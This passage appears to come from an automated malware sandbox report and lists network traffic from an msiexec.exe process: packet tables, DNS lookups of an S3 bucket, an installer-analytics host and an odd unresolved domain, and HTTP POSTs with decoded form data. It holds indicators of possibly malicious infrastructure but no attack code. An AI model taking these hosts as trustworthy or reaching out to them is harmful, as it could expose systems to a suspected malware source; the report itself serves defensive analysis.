Jan 5, 2023 13:18:10.541821957 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541853905 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541862011 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541882992 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541903019 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541908026 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542067051 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542094946 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542120934 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.542129993 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542159081 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.542340040 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542387962 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542406082 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.542417049 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542438984 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.542469978 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.542577982 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542599916 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542634964 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.542648077 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542666912 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.542686939 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.542705059 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542840004 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542865992 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542896032 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.542907953 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.542936087 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.543096066 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.543134928 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.543157101 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.543164968 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.543200970 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.543348074 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.543370962 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.543406010 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.543412924 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.543437958 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.543469906 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.564629078 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.564654112 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.564760923 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.569602013 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.572042942 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.572067022 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.572113991 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.572120905 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:24.642678976 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:24.786858082 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:24.787003040 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:24.787137985 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:24.787251949 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:24.931104898 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:24.931154013 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:24.934134960 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:24.934228897 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:24.947053909 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:24.947137117 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.091195107 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.094058990 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.095850945 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.097033024 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.097058058 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.241080999 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.243577957 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.244328976 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.245635033 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.245693922 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.389837980 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.643944979 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.644151926 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.645819902 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.645865917 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.789943933 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.794043064 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.794154882 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.802831888 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.802831888 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.947634935 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.951167107 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:25.951302052 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.967442036 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:25.967442989 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.111901045 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.114670038 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.114856958 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.117371082 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.117471933 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.261528015 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.264540911 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.264636040 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.266247034 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.266247034 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.410608053 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.413404942 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.413522005 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.473540068 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.473633051 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.617712021 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.725615025 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.725755930 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.742759943 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.742760897 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.887114048 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.889779091 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:26.889875889 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.891071081 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:26.891119003 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.035316944 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.038460016 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.038604021 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.039972067 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.040096998 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.184246063 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.186780930 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.186932087 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.194243908 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.194324970 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.338434935 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.549278021 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.549599886 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.551122904 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.551172972 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.695192099 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.698251963 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.698484898 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.700124025 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.700124025 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.844192028 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.846497059 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.846745968 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.847912073 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.852802992 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:27.997055054 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.999574900 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:27.999809027 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.029720068 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.029720068 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.174099922 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.177062988 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.177220106 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.180310965 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.180311918 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.324615955 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.327100992 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.327191114 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.328874111 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.328916073 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.472906113 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.475650072 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.475744963 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.477577925 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.477664948 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.621598005 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.624401093 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.624510050 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.634284019 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.634337902 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.778469086 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.781052113 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.781157970 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.782672882 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.782742977 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.926907063 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.930021048 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:28.930128098 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.932260036 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:28.932311058 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.077100039 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.079205036 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.079330921 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.080512047 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.080816984 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.225034952 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.228025913 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.228246927 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.231282949 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.231471062 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.375663042 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.379492044 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.379707098 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.381026983 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.381076097 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.525274992 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.528162003 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.528409004 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.529855013 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.529855013 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.674122095 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.677105904 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.677359104 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.679603100 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.679707050 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.823884964 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.826781988 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.826955080 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.834495068 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.834542036 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.978837967 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.981592894 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:29.981776953 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.984772921 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:29.984949112 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.129040956 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.131937981 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.132047892 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.133239985 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.133276939 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.277410030 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.280338049 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.280874968 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.281737089 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.281773090 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.425884962 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.429936886 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.430037022 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.431648970 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.431695938 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.575809956 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.578928947 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.579111099 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.582442999 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.582442999 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.726777077 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.731750965 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.731858015 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.735028028 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.736902952 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.881010056 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.883714914 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:30.883815050 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.885226965 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:30.885377884 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.029665947 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.032007933 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.032138109 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.040606022 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.040651083 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.184793949 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.206187963 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.206295013 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.207782030 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.207850933 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.351906061 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.354715109 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.354861975 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.358182907 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.358182907 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.502322912 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.504965067 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.505057096 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.506567001 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.506603956 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:31.650571108 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.659573078 CET	80	49698	54.205.202.31	192.168.2.3
Jan 5, 2023 13:18:31.659652948 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:32.194299936 CET	49698	80	192.168.2.3	54.205.202.31
Jan 5, 2023 13:18:37.847203016 CET	49699	80	192.168.2.3	20.203.138.85
Jan 5, 2023 13:18:37.864737988 CET	80	49699	20.203.138.85	192.168.2.3
Jan 5, 2023 13:18:37.864906073 CET	49699	80	192.168.2.3	20.203.138.85
Jan 5, 2023 13:18:37.865401030 CET	49699	80	192.168.2.3	20.203.138.85
Jan 5, 2023 13:18:37.882529020 CET	80	49699	20.203.138.85	192.168.2.3
Jan 5, 2023 13:18:37.920202971 CET	80	49699	20.203.138.85	192.168.2.3
Jan 5, 2023 13:18:38.140886068 CET	80	49699	20.203.138.85	192.168.2.3
Jan 5, 2023 13:18:38.141156912 CET	49699	80	192.168.2.3	20.203.138.85
Jan 5, 2023 13:18:42.925520897 CET	80	49699	20.203.138.85	192.168.2.3
Jan 5, 2023 13:18:42.925777912 CET	49699	80	192.168.2.3	20.203.138.85

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2023 13:18:08.759603977 CET	54397	53	192.168.2.3	8.8.8.8
Jan 5, 2023 13:18:08.779268026 CET	53	54397	8.8.8.8	192.168.2.3
Jan 5, 2023 13:18:24.621486902 CET	49977	53	192.168.2.3	8.8.8.8
Jan 5, 2023 13:18:24.641340017 CET	53	49977	8.8.8.8	192.168.2.3
Jan 5, 2023 13:18:38.051055908 CET	57840	53	192.168.2.3	8.8.8.8
Jan 5, 2023 13:18:38.070947886 CET	53	57840	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2023 13:18:08.759603977 CET	192.168.2.3	8.8.8.8	0xa8ed	Standard query (0)	mzrdmodlonnce.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:24.621486902 CET	192.168.2.3	8.8.8.8	0xbc3e	Standard query (0)	collect.installeranalytics.com	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:38.051055908 CET	192.168.2.3	8.8.8.8	0x2d61	Standard query (0)	amxx1515cabreun23.asxo	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	mzrdmodlonnce.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.160.129	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.172.65	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.142.129	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.233.113	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.107.220	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.133.193	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.235.105	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:08.779268026 CET	8.8.8.8	192.168.2.3	0xa8ed	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.248.204	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:24.641340017 CET	8.8.8.8	192.168.2.3	0xbc3e	No error (0)	collect.installeranalytics.com		54.205.202.31	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:24.641340017 CET	8.8.8.8	192.168.2.3	0xbc3e	No error (0)	collect.installeranalytics.com		54.163.120.186	A (IP address)	IN (0x0001)	false
Jan 5, 2023 13:18:38.070947886 CET	8.8.8.8	192.168.2.3	0x2d61	Name error (3)	amxx1515cabreun23.asxo	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mzrdmodlonnce.s3.amazonaws.com

collect.installeranalytics.com

20.203.138.85

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49691	52.217.160.129	443	C:\Windows\SysWOW64\msiexec.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49698	54.205.202.31	80	C:\Windows\SysWOW64\msiexec.exe

Timestamp	kBytes transferred	Direction	Data
Jan 5, 2023 13:18:24.787137985 CET	2066	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 167 Cache-Control: no-cache
Jan 5, 2023 13:18:24.787251949 CET	2067	OUT	Data Raw: 71 74 3d 37 33 36 32 32 38 30 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 36 33 62 34 30 65 63 63 39 37 39 31 32 65 36 31 39 32 37 63 32 31 65 61 26 61 76 3d 38 2e 32 2e 31 2e 35 26 63 69 64 3d 37 46 Data Ascii: qt=7362280&t=lifecycle&lc=start&v=3&aid=63b40ecc97912e61927c21ea&av=8.2.1.5&cid=7FE777F73EC3B047E622A5267A4F42A97E20D4B8&sid=%7B6870A11F-75C9-4B73-AA83-CD80429460DF%7D
Jan 5, 2023 13:18:24.934134960 CET	2067	IN	HTTP/1.1 200 OK Cache-control: no-cache="set-cookie" Date: Thu, 05 Jan 2023 12:18:24 GMT Set-Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA;PATH=/;MAX-AGE=600 X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 5, 2023 13:18:24.947053909 CET	2068	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 179 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
